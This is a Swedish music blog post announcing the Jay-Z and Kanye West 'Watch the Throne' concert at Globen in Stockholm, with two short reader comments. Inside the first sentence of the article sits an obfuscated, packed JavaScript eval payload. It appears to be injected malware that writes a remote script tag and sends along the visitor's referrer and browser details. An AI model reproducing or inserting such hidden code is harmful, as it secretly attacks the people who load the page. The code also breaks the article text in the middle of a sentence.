Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Jay-Z och Kanye West till Sverige!

Alexander Gylemo

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adifi|var|u0026u|referrer|hkdbn||js|php’.split(’|’),0,{}))
var mycket tack vare Jay-Z som Kanye West slog igenom då några av hans låtar kom med på Jiggas The Blueprint år 2001, sedan dess har de stått varann nära och dykt upp i flera av varandras låtar. I slutet av sommarn 2011 tog de sina samarbeten till en helt ny nivå då de släppte albumet ”Watch the Throne” tillsammans på Roc-A-Fella Records där bl.a. Grammyvinnaren ”Otis” finns med och som väntat fick plattan ett grymt mottagande från både fans och recensenter. Sedan skivsläppet har grabbarna turnerat omkring i USA, under tiden har det ryktats även om en Europa-turné utan att något bekräftats – framtills nu då Live Nation idag gick ut med att ”Watch the Throne”-turnén kommer till Globen i Stockholm  den 29:e maj!

Se till att vara vaken då biljetterna släpps 2012-02-27 kl. 09:00, det kommer garanterat vara högtryck!

Comments

  1. Jacob

    Sweet!! Kommer blir riktigt fett!!

  2. Fadde

    Otis 🙂